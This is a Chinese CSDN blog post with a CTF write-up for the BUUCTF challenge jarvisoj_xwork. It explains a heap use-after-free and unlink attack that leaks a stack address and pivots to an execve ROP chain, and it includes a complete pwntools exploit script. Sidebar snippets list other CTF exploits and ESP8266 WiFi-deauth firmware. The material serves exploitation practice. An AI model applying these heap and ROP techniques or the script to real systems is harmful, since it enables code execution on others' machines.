[BUUCTF-pwn] jarvisoj_xwork

最新推荐文章于 2024-01-24 21:21:16 发布
最新推荐文章于 2024-01-24 21:21:16 发布
阅读量178 收藏
点赞数
分类专栏: CTF pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121061065
版权

练习记录

一道静态编译的堆栈题。把堆和栈的两个知识点加到一起

概况:

  1. 静态编译,一般这种情况有syscall和int 0x80,可以用rop或者shellcode(需要rwx段,这题没有)
  2. PIE未开,可以很容易控制指针
  3. 删除符号表,这个比较烦人,根据情况自己命名,还是是菜单题比较容易找无非就是add,free,edit,show,read,atoi之类
  4. free很直接留着指针,add只能写31字节10次,还有edit似乎很容易解决

先大概把容易明白的函数命个名,逐个把菜单看看,有个UAF。但没有libc的情况下,即便很容易fastbin attack也不能搞到got,_free_hook,__malloc_hook之类,倒里栈题里用的ROP,可这里需要栈地址。一般情况下题目加载里没必要放栈地址,栈地址在libc里通过environ获得,如果留了后门就太好了。

用gdb跟进,发现0x6cc640这个位置放着类似environ的栈地址

操作步骤:

  1. 由于fastbin attack要有头标记,最容易的方法就是unlink这个啥都不要。先建6个块(固定大小)一共能建10个,先浪费6个有点贵,但控制指针后就可以不用了。将来0和1合起来,0写unlink头,利用2unlink
  2. free1,2后2的fp指向1,可以泄露这个堆地址
  3. 修改2的指针+20,指向2-0x20这个位置可以写到2的头,建到这里后写pre_size=0x50,2的size改为0x90
  4. free 2 unlink到指针区
  5. 控制指针后将0的指针指向指针1的位置,通过修改1的指针和内容达到任意地址写的目的
  6. 有几个地方需要写
    1. 泄露0x6cc640这个位置得到栈地址
    2. 在name这个位置是可写的,在这里写入rop
    3. 在栈里(exit函数后边的ret位置)写下移栈ROP=pop rbp,name,leave_ret

代码:

from pwn import *

elf = ELF('./pwn')
context(arch = 'amd64',log_level='debug')

#p = process('./pwn')
p = remote('node4.buuoj.cn', 25924) 

menu = b'5.Exit\n'
def add(msg):
    p.sendlineafter(menu, b'1')
    sleep(0.1)
    p.send(msg)

def show(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'index:', str(idx).encode())

def edit(idx, msg):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b'index:', str(idx).encode())
    p.send(msg)

def free(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b'index:', str(idx).encode())

p.sendafter(b'name:', b'/bin/sh\x00') #0x6ccdc0

ptr = 0x6ccd60
#unlink head
add(flat(0,0x51,ptr-0x18,ptr-0x10)[:-1])
add(flat(0,0,0,0x31)[:-1]) 
add(b'A') 
add(b'A') 
add(b'A') 
add(b'A') 

#change chunk pre_size,size
free(1)
free(2)
show(2)
heap = u64(p.recv(8))
edit(2, p64(heap+0x20))
add(b'A')
add(flat(0x50,0x90))
free(2) #unlink

#leak stack
edit(0, flat(0, 0x6cbb80,0, ptr+8)[:-1])
edit(0, flat(0x6cc640))

show(1)
stack = u64(p.recv(8)) - 0x170

pop_rdi = 0x00000000004018a6 # pop rdi ; ret
pop_rsi = 0x00000000004019c7 # pop rsi ; ret
pop_rdx = 0x0000000000443166 # pop rdx ; ret
pop_rbp = 0x00000000004004d1 # pop rbp ; ret
pop_adb = 0x00000000004789a6 # pop rax ; pop rdx ; pop rbx ; ret
leave_ret = 0x0000000000400a12 # leave ; ret
syscall = 0x00000000004003da # syscall 
name      = 0x6ccdc0
bin_sh    = name
new_stack = name+8

#rax=3b rdi->/bin/sh rsi=0 rdx=0
edit(0, p64(new_stack))
edit(1, flat(pop_rdi, bin_sh, pop_rsi))
edit(0, p64(new_stack + 0x18*1))
edit(1, flat(0, pop_adb, 0x3b))
edit(0, p64(new_stack + 0x18*2))
edit(1, flat(0, 0, syscall))
#mov stack to new_stack
edit(0, p64(stack))
edit(1, flat(pop_rbp, new_stack -8, leave_ret))

sleep(0.2)
p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jarvis OJ-PWN
weixin_45461609的博客
08-08 212
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
Jarvis OJ pwn刷题
清霂的博客
03-26 243
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
jarvis oj pwn
qq_44813849的博客
07-24 214
先附上一段大佬的总结,接着再说题。 栈溢出的基本套路: 找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接 构建shellcode,用一句话就行shellcode = asm(shellcraft.sh()) 构建payload,payload...
[JarvisOJ][pwn]Guess
九层台
07-01 850
练习了一个oj平台上的题,感觉收货很多,在这里记下来。 liu@liu-F117-F:~/桌面/oj/猜测$ checksec 1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/\xe7\x8c\x9c\xe6\xb5\x8b/1' Arch: amd64-64-little RELRO: No RELRO Sta...
JarvisOJpwn)guess
苗_的博客
02-26 250
先看一下函数结构: main: int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { struct sockaddr addr; // [rsp+0h] [rbp-20h] __pid_t v4; // [rsp+14h] [rbp-Ch] int v5; // [rsp+18h]...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Jarvis OJ pwn wp - level 0 ~ level 5
fa1c4的blog
07-03 292
level 0 溢出, ROP调用system("/bin/sh"), get shell from pwn import * from pwnlib.util.cyclic import cyclic sel = 1 filename = "./level0" URL, PORT = "pwn2.jarvisoj.com", 9881 io = process(filename) if sel == 0 else remote(URL, PORT) elf = ELF(filename) sy
(Jarvis Oj)(Pwn) Tell Me Something
Nothing
06-14 984
(Jarvis Oj)(Pwn) Tell Me Something 首先查看程序开的保护。基本什么都没有。 丢到ida中,主函数。 然后发现了good_game函数。 这个函数的用途就显而易见了,输出目录下的”flag.txt”文件。于是利用read函数导致的栈溢出,将返回地址覆盖为good_game函数的地址。通过ida或者cyclic工具可以获得需要的填充的长度。写得脚本...
JarvisOJ PWN level系列 wp
苗_的博客
02-09 419
菜菜的小白最近学习pwn,做了Jarvis上的一些题目进行练习,也从很多师傅的博客里学习到了很多新的知识,今天重新温习并且总结一下,以下的wp可能会比较详细,大佬可略: level0 这一题的难度还是蛮容易的,首先拖进ida里,发现有'/bin/sh/字符串和system函数,然后找溢出点,发现read函数这里发生溢出,只给了0x88的内存,但是却要读0x200个字节,必溢出: 然后构造...
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2388
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
Jarvis OJ Level4
qq_39153421的博客
09-19 373
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
Jarvis OJ PWN题解 持续更新~
qq_41071646的博客
03-28 1089
最近沉(被)迷(迫)学pwn 看我们的志琦大佬 我就知道 pwn 玩玩就行 但是 不认真学 不行 然后向大佬打听了几个pwn的平台网站 打算 玩一下 这里找到了Jarvis OJ 然后我 是看那个 做出来的人多 我就做那个·~~~~~~~ 不定期的更新 Tell Me Something 然后这个这道题 其实很简单 栈溢出 没有任何防护 就防护了 ...
jarvisojpwn中level系列wp
Huiuyao的博客
12-09 2795
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
Jarvis oj level1 wp
ditto的博客
12-30 290
看下防护 啥也没开。 放IDA里看下: 很显然,利用泄露的数组的首地址来写通解,就不用管ASLR了。 exp如下: from pwn import* a=remote("pwn2.jarvisoj.com","9877") a.recvuntil("What's this:") addr=a.recvuntil(&
静态编译:Mprotect、自动化rop链;Ret2csu
最新发布
2301_79880752的博客
01-24 1067
开启NX,64位,IDA分析:看左半边不难看出这是一道静态编译题(简单解释,左边函数很多,静态编译占内存一般比动态多的多右半边可以看到,只有一个gets函数可以利用(存在栈溢出由于这题是静态编译题,因此我们可以有多种写法,这里我们分别使用Mprotect与自动化rop链解题。
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值